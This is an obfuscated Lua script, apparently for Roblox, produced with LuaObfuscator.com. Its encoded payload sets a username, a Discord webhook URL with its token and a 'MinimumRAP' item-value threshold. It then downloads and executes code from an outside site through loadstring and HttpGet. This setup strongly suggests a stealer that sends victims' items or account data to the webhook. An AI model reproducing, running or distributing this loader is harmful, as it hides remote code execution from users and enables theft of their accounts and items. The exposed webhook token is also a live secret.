--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=(570 -(367 + 201))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and 1) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * 256) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==((2 -1) -0)) then return (v41 * (16778281 -((125 -57) + (1830 -833)))) + (v40 * ((67156 -(87 + 263)) -(226 + 1044))) + (v39 * (1114 -858)) + v38 ;end if (v37==(117 -(32 + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (958 -(892 + 65)) + 3 ;v37=1;end end end local function v24() local v42=791 -(368 + 423) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(6 -4)) then v47=v20(v44,201 -(67 + 113) ,23 + 8 );v48=((v20(v44,78 -(931 -(261 + 624)) )==(443 -(416 + 26))) and  -((1 -0) + 0)) or ((1083 -(1020 + 60)) -2) ;v42=955 -(802 + 150) ;end if (v42==(2 -1)) then v45=(1862 -(630 + 793)) -(145 + 293) ;v46=(v20(v44,(3 -2) -0 ,(7130 -5624) -(998 + 488) ) * ((1 + 0 + 1)^(24 + 8))) + v43 ;v42=999 -(915 + 82) ;end if (v42==(775 -(201 + 571))) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -(0 -0)) ;else v47=(1748 -(760 + 987)) + 0 ;v45=0;end elseif (v47==(7472 -5425)) then return ((v46==(0 -(1913 -(1789 + 124)))) and (v48 * ((1188 -(1069 + 118))/0))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^(10 + 42)))) ;end if (v42==((766 -(745 + 21)) -0)) then v43=v23();v44=v23();v42=1 + 0 + 0 ;end end end local function v25(v49) local v50;if  not v49 then local v85=0 -0 ;while true do if (v85==(0 -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1, #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(0 -0)) then v53=241 -(187 + 54) ;v54=nil;v52=781 -(162 + 618) ;end if (v52~=2) then else v57=nil;v58=nil;v52=3;end if (v52==1) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52~=(2 + 1)) then else v59=nil;while true do local v90=0;while true do if (v90==(0 -0)) then if (v53==(2 -0)) then for v122=1 + 0 ,v23() do local v123=1636 -(1373 + 263) ;local v124;local v125;while true do if (v123~=0) then else v124=1000 -(451 + 549) ;v125=nil;v123=1 + 0 ;end if (v123==(1 -0)) then while true do if (0~=v124) then else v125=v21();if (v20(v125,1 -0 ,1385 -(746 + 638) )~=(0 + 0)) then else local v145=0;local v146;local v147;local v148;local v149;local v150;local v151;while true do if (v145~=0) then else v146=0 -0 ;v147=nil;v145=342 -(218 + 123) ;end if (v145==2) then v150=nil;v151=nil;v145=1584 -(1535 + 46) ;end if (v145==(1 + 0)) then v148=nil;v149=nil;v145=1 + 1 ;end if (v145~=(563 -(306 + 254))) then else while true do if (1==v146) then v149=nil;v150=nil;v146=2;end if (0==v146) then local v160=0;while true do if (v160==1) then v146=1;break;end if (v160~=(0 + 0)) then else v147=0;v148=nil;v160=1 -0 ;end end end if (v146~=2) then else v151=nil;while true do if (v147==0) then local v164=0;while true do if (v164~=1) then else v147=1468 -(899 + 568) ;break;end if (v164==(0 + 0)) then v148=0 -0 ;v149=nil;v164=604 -(268 + 335) ;end end end if (v147~=(292 -(60 + 230))) then else while true do if (v148==(574 -(426 + 146))) then local v166=0 + 0 ;while true do if (v166~=(1456 -(282 + 1174))) then else if (v20(v150,1,812 -(569 + 242) )==1) then v151[5 -3 ]=v59[v151[1 + 1 ]];end if (v20(v150,2,2)~=1) then else v151[3]=v59[v151[1027 -(706 + 318) ]];end v166=1;end if (1~=v166) then else v148=3;break;end end end if (1==v148) then local v167=1251 -(721 + 530) ;local v168;while true do if (v167~=0) then else v168=0;while true do if (v168~=1) then else v148=1273 -(945 + 326) ;break;end if (v168==0) then local v177=0;while true do if (v177==0) then v151={v22(),v22(),nil,nil};if (v149==(1500 -(1408 + 92))) then local v178=0;local v179;while true do if (v178==(1086 -(461 + 625))) then v179=1288 -(993 + 295) ;while true do if (v179~=0) then else v151[3]=v22();v151[4]=v22();break;end end break;end end elseif (v149==(1 + 0)) then v151[3]=v23();elseif (v149==2) then v151[3]=v23() -(2^(1187 -(418 + 753))) ;elseif (v149~=3) then else local v184=0;local v185;while true do if (0==v184) then v185=0 + 0 ;while true do if (v185==0) then v151[3]=v23() -((1 + 1)^(5 + 11)) ;v151[4]=v22();break;end end break;end end end v177=1;end if (v177==1) then v168=1;break;end end end end break;end end end if (v148==(0 + 0)) then local v169=529 -(406 + 123) ;while true do if (v169==0) then v149=v20(v125,2,3);v150=v20(v125,4,6);v169=1770 -(1749 + 20) ;end if (v169==(1 + 0)) then v148=1323 -(1249 + 73) ;break;end end end if (v148==3) then if (v20(v150,2 + 1 ,1148 -(466 + 679) )==(2 -1)) then v151[4]=v59[v151[4]];end v54[v122]=v151;break;end end break;end if (v147~=(2 -1)) then else v150=nil;v151=nil;v147=1902 -(106 + 1794) ;end end break;end end break;end end end break;end end break;end end end for v126=1,v23() do v55[v126-1 ]=v28();end return v57;end if ((1 + 0)~=v53) then else local v116=0 + 0 ;local v117;while true do if (v116==(0 -0)) then v117=0;while true do if (v117~=(2 -1)) then else local v143=0;while true do if (0~=v143) then else for v153=115 -(4 + 110) ,v58 do local v154=584 -(57 + 527) ;local v155;local v156;local v157;while true do if (v154==0) then local v158=0;local v159;while true do if (v158~=(1427 -(41 + 1386))) then else v159=103 -(17 + 86) ;while true do if ((0 + 0)==v159) then local v165=0 -0 ;while true do if (v165==(0 -0)) then v155=0;v156=nil;v165=1;end if (1==v165) then v159=1;break;end end end if (v159~=(167 -(122 + 44))) then else v154=1;break;end end break;end end end if (v154==(1 -0)) then v157=nil;while true do if (v155==0) then local v161=0;local v162;while true do if (v161~=(0 -0)) then else v162=0 + 0 ;while true do if (v162==(1 + 0)) then v155=1;break;end if (0~=v162) then else v156=v21();v157=nil;v162=1 -0 ;end end break;end end end if (v155~=1) then else if (v156==1) then v157=v21()~=(65 -(30 + 35)) ;elseif (v156==(2 + 0)) then v157=v24();elseif (v156~=3) then else v157=v25();end v59[v153]=v157;break;end end break;end end end v57[3]=v21();v143=1;end if (v143==(1258 -(1043 + 214))) then v117=7 -5 ;break;end end end if (v117==(1212 -(323 + 889))) then local v144=0 -0 ;while true do if (v144~=1) then else v117=1;break;end if (v144~=0) then else v58=v23();v59={};v144=581 -(361 + 219) ;end end end if (v117~=(322 -(53 + 267))) then else v53=2;break;end end break;end end end v90=1 + 0 ;end if (v90~=1) then else if (v53==(413 -(15 + 398))) then local v118=982 -(18 + 964) ;while true do if (v118~=0) then else v54={};v55={};v118=1;end if ((3 -2)==v118) then v56={};v57={v54,v55,nil,v56};v118=2 + 0 ;end if (2~=v118) then else v53=127 -(116 + 10) ;break;end end end break;end end end break;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81==0) then local v95=v80[2];v78[v95]=v78[v95](v13(v78,v95 + 1 ,v73));else local v97;local v98,v99;local v100;local v101;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v101=v80[2];v100=v78[v80[3]];v78[v101 + 1 ]=v100;v78[v101]=v100[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v101=v80[2];v98,v99=v71(v78[v101](v13(v78,v101 + 1 ,v80[3])));v73=(v99 + v101) -1 ;v97=0;for v119=v101,v73 do v97=v97 + 1 ;v78[v119]=v98[v97];end v72=v72 + 1 ;v80=v68[v72];v101=v80[2];v78[v101]=v78[v101](v13(v78,v101 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81<=2) then do return;end elseif (v81>3) then v78[v80[2]]();else local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v140=v128,v73 do v131=v131 + 1 ;v78[v140]=v129[v131];end end elseif (v81<=7) then if (v81<=5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==6) then v78[v80[2]]=v80[3];else v62[v80[3]]=v78[v80[2]];end elseif (v81<=8) then local v111=v80[2];local v112=v78[v80[3]];v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];elseif (v81>9) then v72=v80[3];else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0E3O00028O0003083O00557365726E616D6503073O0048654461726B6E03093O00557365726E616D6532026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132342O3139313335343339303831303730362F5445755273665341686B5844666C54524A773638793841644D423342377775467263426E524151696C4271497963567434784F6A583554304A4F346462475055454E6B67030A3O004D696E696D756D524150025O006AF840027O0040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E7370616365001B3O0012063O00013O0026053O00080001000100040A3O00080001001206000100033O001207000100023O001206000100033O001207000100043O0012063O00053O0026053O000F0001000500040A3O000F0001001206000100073O001207000100063O001206000100093O001207000100083O0012063O000A3O0026053O00010001000A00040A3O000100010012090001000B3O0012010002000C3O00202O00020002000D00122O0004000E6O000200046O00013O00024O00010001000100044O001A000100040A3O000100012O00023O00017O00",v9(),...);
